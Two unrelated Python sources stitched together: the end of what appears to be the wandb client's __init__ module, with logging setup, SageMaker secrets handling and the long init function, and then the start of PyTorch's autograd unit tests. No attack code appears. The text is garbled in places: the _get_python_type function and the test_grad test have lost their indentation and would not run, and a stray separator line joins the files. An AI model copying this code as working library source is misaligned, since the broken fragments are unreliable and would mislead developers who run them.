            'WANDB_') and key not in exclude]
        for key in wandb_keys:
            del os.environ[key]
        return True
    else:
        return False
def try_to_set_up_global_logging():
    """Try to set up global W&B debug log that gets re-written by every W&B process.
    It may fail (and return False) eg. if the current directory isn't user-writable
    """
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG)
    fmt = logging.Formatter(
        '%(asctime)s %(levelname)-7s %(threadName)-10s:%(process)d [%(filename)s:%(funcName)s():%(lineno)s] %(message)s')

    def _attach(handler):
        # Every handler logs at DEBUG with the shared format.
        handler.setLevel(logging.DEBUG)
        handler.setFormatter(fmt)
        root_logger.addHandler(handler)

    if env.is_debug():
        _attach(logging.StreamHandler())
    try:
        _attach(logging.FileHandler(GLOBAL_LOG_FNAME, mode='w'))
    except IOError as e:  # eg. in case wandb directory isn't writable
        termerror('Failed to set up logging: {}'.format(e))
        return False
    return True
def _get_python_type():
try:
if 'terminal' in get_ipython().__module__:
return 'ipython'
else:
return 'jupyter'
except (NameError, AttributeError):
return "python"
def sagemaker_auth(overrides=None, path="."):
    """ Write a secrets.env file with the W&B ApiKey and any additional secrets passed.
    Args:
        overrides (dict, optional): Additional environment variables to write to secrets.env
        path (str, optional): The path to write the secrets file.
    """
    # BUG FIX: the original used a mutable default ({}) and then wrote the
    # resolved api key back into it, so the key leaked into every later call
    # (and into caller-owned dicts). Copy so we never mutate shared state.
    overrides = dict(overrides) if overrides else {}
    api_key = overrides.get(env.API_KEY, Api().api_key)
    if api_key is None:
        raise ValueError(
            "Can't find W&B ApiKey, set the WANDB_API_KEY env variable or run `wandb login`")
    overrides[env.API_KEY] = api_key
    with open(os.path.join(path, "secrets.env"), "w") as file:
        for k, v in six.iteritems(overrides):
            file.write("{}={}\n".format(k, v))
def init(job_type=None, dir=None, config=None, project=None, entity=None, reinit=None, tags=None,
         group=None, allow_val_change=False, resume=False, force=False, tensorboard=False,
         sync_tensorboard=False, monitor_gym=False, name=None, notes=None, id=None, magic=None,
         anonymous=None):
    """Initialize W&B
    If called from within Jupyter, initializes a new run and waits for a call to
    `wandb.log` to begin pushing metrics. Otherwise, spawns a new process
    to communicate with W&B.
    Args:
        job_type (str, optional): The type of job running, defaults to 'train'
        config (dict, argparse, or tf.FLAGS, optional): The hyper parameters to store with the run
        project (str, optional): The project to push metrics to
        entity (str, optional): The entity to push metrics to
        dir (str, optional): An absolute path to a directory where metadata will be stored
        group (str, optional): A unique string shared by all runs in a given group
        tags (list, optional): A list of tags to apply to the run
        id (str, optional): A globally unique (per project) identifier for the run
        name (str, optional): A display name which does not have to be unique
        notes (str, optional): A multiline string associated with the run
        reinit (bool, optional): Allow multiple calls to init in the same process
        resume (bool, str, optional): Automatically resume this run if run from the same machine,
            you can also pass a unique run_id
        sync_tensorboard (bool, optional): Synchronize wandb logs to tensorboard or tensorboardX
        force (bool, optional): Force authentication with wandb, defaults to False
        magic (bool, dict, or str, optional): magic configuration as bool, dict, json string,
            yaml filename
        anonymous (str, optional): Can be "allow", "must", or "never". Controls whether anonymous logging is allowed.
            Defaults to never.
    Returns:
        A wandb.run object for metric and config logging.
    """
    init_args = locals()
    trigger.call('on_init', **init_args)
    global run
    global __stage_dir__
    global _global_watch_idx
    # We allow re-initialization when we're in Jupyter or explicity opt-in to it.
    in_jupyter = _get_python_type() != "python"
    if reinit or (in_jupyter and reinit != False):
        # Reset global state for pytorch watch and tensorboard
        _global_watch_idx = 0
        if len(patched["tensorboard"]) > 0:
            util.get_module("wandb.tensorboard").reset_state()
        reset_env(exclude=env.immutable_keys())
        if len(_global_run_stack) > 0:
            if len(_global_run_stack) > 1:
                termwarn("If you want to track multiple runs concurrently in wandb you should use multi-processing not threads")
            join()
        run = None
    # TODO: deprecate tensorboard
    # BUG FIX: parenthesized (tensorboard or sync_tensorboard) so the
    # "not yet patched" guard applies to both flags; previously
    # `tensorboard=True` re-patched even when already patched because
    # `and` binds tighter than `or`.
    if (tensorboard or sync_tensorboard) and len(patched["tensorboard"]) == 0:
        util.get_module("wandb.tensorboard").patch()
    if monitor_gym and len(patched["gym"]) == 0:
        util.get_module("wandb.gym").monitor()
    sagemaker_config = util.parse_sm_config()
    tf_config = util.parse_tfjob_config()
    if group is None:
        group = os.getenv(env.RUN_GROUP)
    if job_type is None:
        job_type = os.getenv(env.JOB_TYPE)
    if sagemaker_config:
        # Set run_id and potentially grouping if we're in SageMaker
        run_id = os.getenv('TRAINING_JOB_NAME')
        if run_id:
            os.environ[env.RUN_ID] = '-'.join([
                run_id,
                os.getenv('CURRENT_HOST', socket.gethostname())])
        conf = json.load(
            open("/opt/ml/input/config/resourceconfig.json"))
        if group is None and len(conf["hosts"]) > 1:
            group = os.getenv('TRAINING_JOB_NAME')
        # Set secret variables
        if os.path.exists("secrets.env"):
            for line in open("secrets.env", "r"):
                key, val = line.strip().split('=', 1)
                os.environ[key] = val
    elif tf_config:
        cluster = tf_config.get('cluster')
        job_name = tf_config.get('task', {}).get('type')
        task_index = tf_config.get('task', {}).get('index')
        if job_name is not None and task_index is not None:
            # TODO: set run_id for resuming?
            run_id = cluster[job_name][task_index].rsplit(":")[0]
            if job_type is None:
                job_type = job_name
            if group is None and len(cluster.get("worker", [])) > 0:
                group = cluster[job_name][0].rsplit("-"+job_name, 1)[0]
    image = util.image_id_from_k8s()
    if image:
        os.environ[env.DOCKER] = image
    # Mirror explicit arguments into the environment so the child/headless
    # process and Run.from_environment_or_defaults() pick them up.
    if project:
        os.environ[env.PROJECT] = project
    if entity:
        os.environ[env.ENTITY] = entity
    if group:
        os.environ[env.RUN_GROUP] = group
    if job_type:
        os.environ[env.JOB_TYPE] = job_type
    if tags:
        if isinstance(tags, str):
            # People sometimes pass a string instead of an array of strings...
            tags = [tags]
        os.environ[env.TAGS] = ",".join(tags)
    if id:
        os.environ[env.RUN_ID] = id
        # BUG FIX: `resume is not "must"` compared string identity, which is
        # interpreter-dependent (and a SyntaxWarning on py3.8+); use `!=`.
        if name is None and resume != "must":
            # We do this because of https://github.com/wandb/core/issues/2170
            # to ensure that the run's name is explicitly set to match its
            # id. If we don't do this and the id is eight characters long, the
            # backend will set the name to a generated human-friendly value.
            #
            # In any case, if the user is explicitly setting `id` but not
            # `name`, their id is probably a meaningful string that we can
            # use to label the run.
            #
            # In the resume="must" case, we know we are resuming, so we should
            # make sure to not set the name because it would have been set with
            # the original run.
            #
            # TODO: handle "auto" resume by moving this logic later when we know
            # if there is a resume.
            name = os.environ.get(env.NAME, id)  # environment variable takes precedence over this.
    if name:
        os.environ[env.NAME] = name
    if notes:
        os.environ[env.NOTES] = notes
    if magic is not None and magic is not False:
        if isinstance(magic, dict):
            os.environ[env.MAGIC] = json.dumps(magic)
        elif isinstance(magic, str):
            os.environ[env.MAGIC] = magic
        elif isinstance(magic, bool):
            pass
        else:
            termwarn("wandb.init called with invalid magic parameter type", repeat=False)
        from wandb import magic_impl
        magic_impl.magic_install(init_args=init_args)
    if dir:
        os.environ[env.DIR] = dir
        util.mkdir_exists_ok(wandb_dir())
    if anonymous is not None:
        os.environ[env.ANONYMOUS] = anonymous
    if os.environ.get(env.ANONYMOUS, "never") not in ["allow", "must", "never"]:
        raise LaunchError("anonymous must be set to 'allow', 'must', or 'never'")
    resume_path = os.path.join(wandb_dir(), wandb_run.RESUME_FNAME)
    if resume == True:
        os.environ[env.RESUME] = "auto"
    elif resume in ("allow", "must", "never"):
        os.environ[env.RESUME] = resume
        if id:
            os.environ[env.RUN_ID] = id
    elif resume:
        os.environ[env.RESUME] = os.environ.get(env.RESUME, "allow")
        # TODO: remove allowing resume as a string in the future
        os.environ[env.RUN_ID] = id or resume
    elif os.path.exists(resume_path):
        os.remove(resume_path)
    if os.environ.get(env.RESUME) == 'auto' and os.path.exists(resume_path):
        if not os.environ.get(env.RUN_ID):
            os.environ[env.RUN_ID] = json.load(open(resume_path))["run_id"]
    # the following line is useful to ensure that no W&B logging happens in the user
    # process that might interfere with what they do
    # logging.basicConfig(format='user process %(asctime)s - %(name)s - %(levelname)s - %(message)s')
    # If a thread calls wandb.init() it will get the same Run object as
    # the parent. If a child process with distinct memory space calls
    # wandb.init(), it won't get an error, but it will get a result of
    # None.
    # This check ensures that a child process can safely call wandb.init()
    # after a parent has (only the parent will create the Run object).
    # This doesn't protect against the case where the parent doesn't call
    # wandb.init but two children do.
    if run or os.getenv(env.INITED):
        return run
    if __stage_dir__ is None:
        __stage_dir__ = "wandb"
        util.mkdir_exists_ok(wandb_dir())
    try:
        signal.signal(signal.SIGQUIT, _debugger)
    except AttributeError:
        # SIGQUIT is not available on all platforms (e.g. Windows).
        pass
    try:
        run = wandb_run.Run.from_environment_or_defaults()
        _global_run_stack.append(run)
    except IOError as e:
        termerror('Failed to create run directory: {}'.format(e))
        raise LaunchError("Could not write to filesystem.")
    run.set_environment()

    def set_global_config(run):
        global config  # because we already have a local config
        config = run.config
    set_global_config(run)
    global summary
    summary = run.summary
    # set this immediately after setting the run and the config. if there is an
    # exception after this it'll probably break the user script anyway
    os.environ[env.INITED] = '1'
    if in_jupyter:
        _init_jupyter(run)
    elif run.mode == 'clirun':
        pass
    elif run.mode == 'run':
        api = InternalApi()
        # let init_jupyter handle this itself
        if not in_jupyter and not api.api_key:
            termlog(
                "W&B is a tool that helps track and visualize machine learning experiments")
            if force:
                termerror(
                    "No credentials found. Run \"wandb login\" or \"wandb off\" to disable wandb")
            else:
                if util.prompt_api_key(api):
                    _init_headless(run)
                else:
                    termlog(
                        "No credentials found. Run \"wandb login\" to visualize your metrics")
                    run.mode = "dryrun"
                    _init_headless(run, False)
        else:
            _init_headless(run)
    elif run.mode == 'dryrun':
        termlog(
            'Dry run mode, not syncing to the cloud.')
        _init_headless(run, False)
    else:
        termerror(
            'Invalid run mode "%s". Please unset WANDB_MODE.' % run.mode)
        raise LaunchError("The WANDB_MODE environment variable is invalid.")
    # set the run directory in the config so it actually gets persisted
    run.config.set_run_dir(run.dir)
    # we have re-read the config, add telemetry data
    telemetry_updated = run.config._telemetry_update()
    if sagemaker_config:
        run.config._update(sagemaker_config)
        allow_val_change = True
    if config or telemetry_updated:
        run.config._update(config, allow_val_change=allow_val_change, as_defaults=not allow_val_change)
    # Access history to ensure resumed is set when resuming
    run.history
    # Load the summary to support resuming
    run.summary.load()
    return run
# Lazily-imported integration submodules: the real import only happens on
# first attribute access, keeping `import wandb` fast.
tensorflow = util.LazyLoader('tensorflow', globals(), 'wandb.tensorflow')
tensorboard = util.LazyLoader('tensorboard', globals(), 'wandb.tensorboard')
jupyter = util.LazyLoader('jupyter', globals(), 'wandb.jupyter')
keras = util.LazyLoader('keras', globals(), 'wandb.keras')
fastai = util.LazyLoader('fastai', globals(), 'wandb.fastai')
docker = util.LazyLoader('docker', globals(), 'wandb.docker')
xgboost = util.LazyLoader('xgboost', globals(), 'wandb.xgboost')
gym = util.LazyLoader('gym', globals(), 'wandb.gym')
ray = util.LazyLoader('ray', globals(), 'wandb.ray')
__all__ = ['init', 'config', 'summary', 'join', 'login', 'log', 'save', 'restore',
'tensorflow', 'watch', 'types', 'tensorboard', 'jupyter', 'keras', 'fastai',
'docker', 'xgboost', 'gym', 'ray', 'run', 'join', 'Image', 'Video',
'Audio', 'Table', 'Html', 'Object3D', 'Histogram', 'Graph', 'Api']
|
test_autograd.py | import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
# Default absolute tolerance for floating-point comparisons in these tests.
PRECISION = 1e-4
def graph_desc(fn):
    """Render an autograd graph node as a nested "Name(child, ...)" string.

    Recurses through ``fn.next_functions``; a missing node renders as 'None'.
    """
    if fn is None:
        return 'None'
    children = ', '.join(graph_desc(child) for child, _ in fn.next_functions)
    return '{}({})'.format(type(fn).__name__, children)
class TestAutograd(TestCase):
    def test_tensor_grad_warnings(self):
        """Accessing .grad warns on non-leaves, but not on leaves or retained non-leaves."""
        dummy = torch.empty(1)
        with warnings.catch_warnings(record=True) as w:
            # Accessing .grad on leaf
            dummy.requires_grad_()
            foo = dummy.grad
            self.assertEqual(len(w), 0)
            # Accessing .grad on non-leaf
            dummy = dummy.clone()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
            # Accessing .grad on non-leaf that retains gradients
            dummy.retain_grad()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
    def _function_test(self, cls):
        """Shared forward/backward check for a custom Function class.

        Applies ``cls`` to (x, 2, y), backprops through the sum with
        create_graph=True, and asserts the gradients expected by the
        MyFunction variants defined in the callers; returns (x, y).
        """
        x = torch.randn(5, 5, requires_grad=True)
        y = torch.randn(5, 5, requires_grad=True)
        result = cls.apply(x, 2, y)
        go = torch.ones((), requires_grad=True)
        result.sum().backward(go, create_graph=True)
        self.assertEqual(x.grad, y + torch.ones(5, 5))
        self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
        # create_graph=True means the grads themselves have grad_fns.
        self.assertIsNotNone(x.grad.grad_fn)
        self.assertIsNotNone(y.grad.grad_fn)
        return x, y
    def test_function(self):
        """End-to-end check of a custom Function saving a scalar and tensors for backward."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
            @staticmethod
            def backward(ctx, grad_output):
                var1, var2 = ctx.saved_tensors
                # NOTE: self is the test case here
                self.assertIsInstance(var1, torch.Tensor)
                self.assertIsInstance(var2, torch.Tensor)
                self.assertIsInstance(grad_output, torch.Tensor)
                return (grad_output + grad_output * var2, None,
                        grad_output * ctx.pyscalar + grad_output * var1)
        x, y = self._function_test(MyFunction)
        # Compare the double-backward graph structure against expected-output files.
        x_grad_desc = graph_desc(x.grad.grad_fn)
        y_grad_desc = graph_desc(y.grad.grad_fn)
        self.assertExpected(x_grad_desc, "x_grad_desc")
        self.assertExpected(y_grad_desc, "y_grad_desc")
    def test_once_differentiable(self):
        """@once_differentiable backward runs with grad disabled and yields Error nodes in the graph."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
            @staticmethod
            @once_differentiable
            def backward(ctx, grad_output):
                # once_differentiable runs backward under no_grad.
                self.assertFalse(torch.is_grad_enabled())
                t1, t2 = ctx.saved_tensors
                return (grad_output + grad_output * t2, None,
                        grad_output * ctx.pyscalar + grad_output * t1)
        x, y = self._function_test(MyFunction)
        self.assertEqual(graph_desc(x.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
        self.assertEqual(graph_desc(y.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
    def test_function_returns_input(self):
        """Gradients flow correctly when a Function's forward returns its input as-is."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x
            @staticmethod
            def backward(ctx, grad):
                return grad * 2
        # Check both 1-element and 0-dim shapes.
        for shape in [(1,), ()]:
            v = torch.ones(shape, requires_grad=True)
            MyFunction.apply(v).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
            with torch.no_grad():
                v.grad.zero_()
            # Also through a cloned (non-identical) input.
            MyFunction.apply(v.clone()).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
    def test_function_returns_undefined_tensor(self):
        """A custom backward returning None propagates undefined grads (leaf .grad stays None)."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2
            @staticmethod
            def backward(ctx, grad):
                return None
        # Test that undefined tensors returned from custom backward function
        # are propagated as undefined and not tensor full of zeroes
        x = torch.ones(1, requires_grad=True)
        MyFunction.apply(x).backward()
        self.assertIsNone(x.grad)
        MyFunction.apply(x ** 2).backward()
        self.assertIsNone(x.grad)
        MyFunction.apply(x).sum().backward()
        self.assertIsNone(x.grad)
        self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
    def test_materialize_grads(self):
        """By default, undefined incoming grads are materialized as zero tensors."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x
            @staticmethod
            def backward(ctx, grad):
                # UndefinedGrad feeds an undefined grad; default materialization
                # turns it into zeros.
                self.assertEqual(grad, torch.zeros(1))
                return grad
        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_dont_materialize_grads(self):
        """With set_materialize_grads(False), undefined grads arrive as None."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.set_materialize_grads(False)
                return x
            @staticmethod
            def backward(ctx, grad):
                self.assertIsNone(grad)
                return grad
        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_legacy_function_deprecation_exception(self):
        """Old-style (non-static forward) autograd Functions raise a deprecation error."""
        # Trigger exception
        class MyFunction(Function):
            def forward(self, x):
                return x
            def backward(self, grad_output):
                return grad_output
        # Check exception occurs
        with self.assertRaisesRegex(
                RuntimeError,
                'Legacy autograd function with non-static forward method is deprecated'):
            MyFunction()(torch.randn(3, 4))
    class SimulateBackwardError(Function):
        """Identity-forward Function whose backward always raises, for error-propagation tests."""
        @staticmethod
        def forward(ctx, input):
            return input.clone()
        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            raise Exception("Simulate error on backward pass")
    def test_custom_function_exception(self):
        """An exception raised in a custom backward surfaces from .backward()."""
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        tmp = (t1 + t2) * (t1 + t2)
        t3 = TestAutograd.SimulateBackwardError.apply(tmp)
        with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
            t3.sum().backward()
    def test_custom_function_non_tensor_inputs_outputs(self):
        """Custom Functions may mix tensor and non-tensor inputs/outputs; grads for non-tensors are None."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                # Save scale
                ctx.scale = scale
                ctx.save_for_backward(t1, t2, t3)
                return scale, t4, None, True, t5, "bar", t1
            @staticmethod
            @once_differentiable
            def backward(ctx, *grads):
                # Verify grads
                # One incoming grad per forward output; non-tensor outputs get None.
                self.assertEqual(7, len(grads))
                self.assertIsNone(grads[0])
                self.assertIsNone(grads[2])
                self.assertIsNone(grads[3])
                self.assertIsNone(grads[5])
                scale = ctx.scale
                var1, var2, var3 = ctx.saved_tensors
                return (
                    grads[1] * scale + grads[4] * var2 * scale + grads[6],
                    grads[1] * var3 * scale + grads[4] * var1 * scale,
                    None,
                    grads[1] * var2 * scale + grads[4] * scale,
                )
        t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t3 = torch.rand(10, dtype=torch.double)
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
        # Validate running backward.
        torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
        self.assertIsNotNone(t1.grad)
        self.assertIsNotNone(t2.grad)
        self.assertIsNone(t3.grad)
        # Test gradcheck
        def foo(t1, t2, t3):
            res = MyFunction.apply(t1, t2, scale, t3)
            return res[1], res[4], res[6]
        gradcheck(foo, (t1, t2, t3))
    def test_custom_function_no_tensors(self):
        """A custom Function works even when every input/output is a plain Python value."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                return scale, t4, None, True, t5, "bar", t1
            @staticmethod
            @once_differentiable
            def backward(ctx, *args):
                return (args[0], args[1], None, args[2])
        t1 = random.random()
        t2 = random.random()
        t3 = random.random()
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
    def test_invalid_gradients(self):
        """A backward returning a wrongly-shaped gradient raises a RuntimeError."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2
            @staticmethod
            def backward(ctx, grad_output):
                # Wrong shape on purpose: input is 5x5, this is length-10.
                return torch.randn(10, dtype=torch.float)
        with self.assertRaisesRegex(RuntimeError, 'expected shape'):
            input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
            MyFunction.apply(input).sum().backward()
    def test_unrelated_inputs(self):
        """gradcheck/gradgradcheck succeed even with an unused differentiable input."""
        # test to ensure grad(grad)check runs successfully even if there is an
        # unrelated (but differentiable) inputs
        def my_function(x, y):
            return x * x
        x = torch.rand(10, dtype=torch.double, requires_grad=True)
        y = torch.rand(10, dtype=torch.double, requires_grad=True)
        gradcheck(my_function, (x, y))
        gradgradcheck(my_function, (x, y))
    def test_not_implemented_grad(self):
        """Backward through an op without a derivative raises NotImplementedError."""
        a = torch.rand(2, requires_grad=True)
        # if grad for nextafter ends up being implemented, this should be changed
        y = torch.nextafter(a, a).sum()
        with self.assertRaisesRegex(
                NotImplementedError,
                'the derivative for .* is not implemented'):
            y.backward()
    def test_not_implemented_fwad(self):
        """Forward-mode AD through an unsupported op raises NotImplementedError."""
        x = torch.randn(3)
        v = torch.rand(3)
        mat = torch.randn(2, 3)
        with fwAD.dual_level():
            dual_x = fwAD.make_dual(x, v)
            err_msg = r"Trying to use forward AD with .* that does not support it"
            hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
            with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
                # if forward AD ends up being implemented for torch.mv, choose a different op
                res = torch.mv(mat, dual_x)
    def test_accumulate_grad(self):
        """Gradient accumulation is in-place for create_graph=False, out-of-place for True."""
        grad_output = torch.ones(5, 5)
        def compute_grad(create_graph):
            x = torch.randn(5, 5, requires_grad=True)
            y = x + 2
            y.backward(grad_output, retain_graph=True)
            x_grad = x.grad
            x_grad_clone = x.grad.clone()
            y.backward(grad_output, create_graph=create_graph)
            return x_grad, x_grad_clone
        # Accumulate in-place when create_graph is False
        x_grad, x_grad_clone = compute_grad(create_graph=False)
        self.assertEqual(x_grad, x_grad_clone * 2)
        # Accumulate out-of-place when create_graph is True
        # (original comment wrongly said "False" here)
        x_grad, x_grad_clone = compute_grad(create_graph=True)
        self.assertEqual(x_grad, x_grad_clone)
    def test_accumulate_grad_tensor_reference(self):
        """Checks when accumulation preserves the identity of the .grad tensor object."""
        def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
            params = torch.tensor([1.5, 1.5]).requires_grad_()
            params.grad = params_grad_tensor
            grad_saved = params.grad
            params.backward(backward_grad_tensor, create_graph=create_graph)
            self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
        for create_graph in (False, True):
            # Accumulate dense gradient to sparse gradient will change the `params.grad` reference
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.tensor([1.5, 1.5]),
                False,  # never accumulates in-place
                create_graph)
            # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.tensor([1.5, 1.5]),
                torch.tensor([1.5, 1.5]),
                not create_graph,
                create_graph)
            # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                not create_graph,
                create_graph)
    @skipIfNoLapack
    def test_slogdet_sign(self):
        """slogdet's sign output requires no grad; backward through sign*logdet still works."""
        a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
        s, logdet = a.slogdet()
        # test that sign should not require grad
        self.assertFalse(s.requires_grad)
        # test that backward through computation involving sign works
        def sign_mul_logdet(mat):
            s, logdet = mat.slogdet()
            return s * logdet
        # Build matrices with controlled determinant sign via SVD.
        u, s, v = a.detach().svd()
        s.abs_().clamp_(0.0001)
        for sign in (-1, 1):
            s[-1] = sign
            mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
            gradcheck(sign_mul_logdet, mat)
            gradgradcheck(sign_mul_logdet, mat)
    def test_sum_to_with_empty_dim_grad(self):
        """Broadcasting with a zero-sized dim produces correctly-shaped zero grads."""
        a = torch.rand(4, 0, requires_grad=True)
        b = torch.rand(4, 1, requires_grad=True)
        c = a + b
        assert c.shape == (4, 0)
        c.sum().backward()
        self.assertEqual(b.grad, torch.zeros(4, 1))
        self.assertEqual(a.grad, torch.zeros(4, 0))
    def test_hessian_vector(self):
        """Double-backward accumulates the Hessian-vector product on top of first grads."""
        x = torch.randn(2, 2, requires_grad=True)
        y = torch.randn(2, 2, requires_grad=True)
        z = x ** 2 + y * x + y ** 2
        z.backward(torch.ones(2, 2), create_graph=True)
        with torch.no_grad():
            x_grad = 2 * x + y
            y_grad = x + 2 * y
        self.assertEqual(x.grad, x_grad)
        self.assertEqual(y.grad, y_grad)
        # Backward through the grads themselves; results accumulate into .grad.
        grad_sum = 2 * x.grad + y.grad
        grad_sum.backward(torch.ones(2, 2))
        x_hv = torch.ones(2, 2) * 5
        y_hv = torch.ones(2, 2) * 4
        self.assertEqual(x.grad, x_grad + x_hv)
        self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
    def test_grad_nonleaf(self):
        """Gradient ascent through non-leaf tensors: grad() works, .grad stays unset until backward()."""
        x_init = torch.randn(2, 2, requires_grad=True)
        x = x_init
        y = torch.randn(2, 2, requires_grad=True)
        grad_output = torch.ones(2, 2)
        def fn(x):
            return x ** 2 + y * x + y ** 2
        for _ in range(5):
            grad_x, = torch.autograd.grad(
                fn(x), x, grad_outputs=grad_output, create_graph=True)
            grad_x_expected = 2 * x + y
            self.assertIsNone(y.grad)
            self.assertIsNone(x.grad)
            self.assertEqual(grad_x, grad_x_expected)
            # Gradient-ascent step keeps x a non-leaf for the next iteration.
            x = x + 0.05 * grad_x
        val_init = fn(x_init).sum()
        val_final = fn(x).sum()
        self.assertGreater(val_final, val_init)
        x.backward(grad_output)
        self.assertIsNotNone(y.grad)
        self.assertIsNotNone(x_init.grad)
    def test_grad_nonleaf_many_outputs(self):
        """grad() on two chunks of one tensor does not fire the tensor's hook or set .grad."""
        # This checks an edge case for function callbacks
        # We want to capture two grads of a function, but can only
        # register a single callback.
        x = torch.randn(4, 2, requires_grad=True)
        a, b = x.chunk(2)
        def hook(*grads):
            hook_called[0] = True
        hook_called = [False]
        x.register_hook(hook)
        go = torch.randn(2, 2)
        grad_a, grad_b = torch.autograd.grad(
            (a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
        self.assertEqual(grad_a, go)
